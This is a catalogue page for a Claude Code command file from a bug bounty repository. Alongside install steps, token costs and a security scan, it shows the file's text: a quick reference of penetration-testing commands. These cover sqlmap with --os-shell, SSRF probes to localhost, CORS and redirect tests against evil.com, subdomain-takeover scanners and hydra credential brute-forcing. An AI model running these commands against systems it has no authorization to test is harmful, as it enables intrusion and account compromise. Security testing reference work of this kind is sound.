exploitation-commands

exploitation-commands is a command for Claude Code from sanjaysaini1952/BugBounty-Arsenal. It costs 0 tokens per session (427 once invoked), scanned A, original, MIT.

A command reference for checking common web security weaknesses, including cross-site scripting (XSS), SQL injection, SSRF, and unsafe cross-origin access.

In plain words
What is it for?
Use it to run checks with Dalfox, sqlmap, curl, Subzy, Subjack, wafw00f, and Hydra against authorized targets.
Why use it?
It puts example commands for several security checks in one place, reducing the need to remember each tool's syntax.

Command for Claude Code

Written for Claude Code: a Claude Code command (commands/*.md).

Good fit Use it to run checks with Dalfox, sqlmap, curl, Subzy, Subjack, wafw00f, and Hydra against authorized targets.

Compare 6 commands from other repositories ↓
Install with agentmods
npx agentmods add commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands
Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

Clone the repo
git clone --depth 1 https://github.com/sanjaysaini1952/BugBounty-Arsenal

Made for: Claude Code.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for exploitation-commands

README.md
[![agentmods](https://agentmods.dev/badge/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands/github.svg)](https://agentmods.dev/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands)
Your own site
<a href="https://agentmods.dev/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands"><img src="https://agentmods.dev/badge/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands/github.svg" alt="Measured on agentmods" height="20"></a>

Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.

agentmods 80×15 button for exploitation-commands

Your own site · 80×15
<a href="https://agentmods.dev/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands"><img src="https://agentmods.dev/badge/commands/sanjaysaini1952/bugbounty-arsenal/exploitation-commands.svg" alt="Reviewed on agentmods" width="80" height="20"></a>
Per session 0 Only the description is in the session, so the agent can decide to use it. The body loads when it is invoked.
When invoked 427 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 1 finding. A grade says what 26 rules found in the file — not that it is safe.
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00000 $0.00427
Opus 5 $0.00000 $0.00214
Sonnet 5 $0.00000 $0.00085
Haiku 4.5 $0.00000 $0.00043

Measured 11d ago against content hash 3cf6f86c1edd, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-11, from the pricing page.

Security

Grade A, and why

exploitation-commands scanned grade A with 1 finding against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 11d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Makes network callslowCapability

Not a fault in itself. Listed so you know the mod talks to something, and to what.

# Using curl with various bypasses
commands/exploitation-commands.md · 51 lines

What it actually says

Quick Reference: Exploitation Commands

XSS Testing

dalfox url "https://target.com/page?q=test" --skip-bav -o xss_results.txt
cat urls.txt | dalfox pipe --skip-bav -o xss_pipe_results.txt

SQL Injection Testing

sqlmap -u "https://target.com/page?id=1" --batch --level=5 --risk=3
sqlmap -u "https://target.com/page?id=1" --batch --os-shell

SSRF Testing

# Using curl with various bypasses
curl -k "https://target.com/fetch?url=http://127.0.0.1:8080"
curl -k "https://target.com/fetch?url=http://0x7f000001"
curl -k "https://target.com/fetch?url=http://2130706433"

CORS Testing

curl -k -H "Origin: https://evil.com" -I https://target.com/api
curl -k -H "Origin: null" -I https://target.com/api

Open Redirect Testing

curl -k -I "https://target.com/redirect?url=https://evil.com"
curl -k -I "https://target.com/redirect?url=//evil.com"

Subdomain Takeover

subzy run --targets subdomains.txt --concurrency 10
subjack -w subdomains.txt -t 100 -timeout 30 -o subjack_results.txt

WAF Detection

wafw00f -i target.com -v

Default Credentials

hydra -l admin -P wordlists/default-credentials.txt target.com ssh
hydra -l admin -P wordlists/default-credentials.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 11d ago First seen · 51 lines · 0 tokens per session scan A 3cf6f86c1edd

Subscribe to this mod's changes

exploitation-commands is a command published in the GitHub repository sanjaysaini1952/BugBounty-Arsenal (2 stars, last pushed 1mo ago), licensed MIT. It costs nothing until one of its globs matches a file; then it loads 427 tokens. A static security scan graded it A with 1 finding (makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.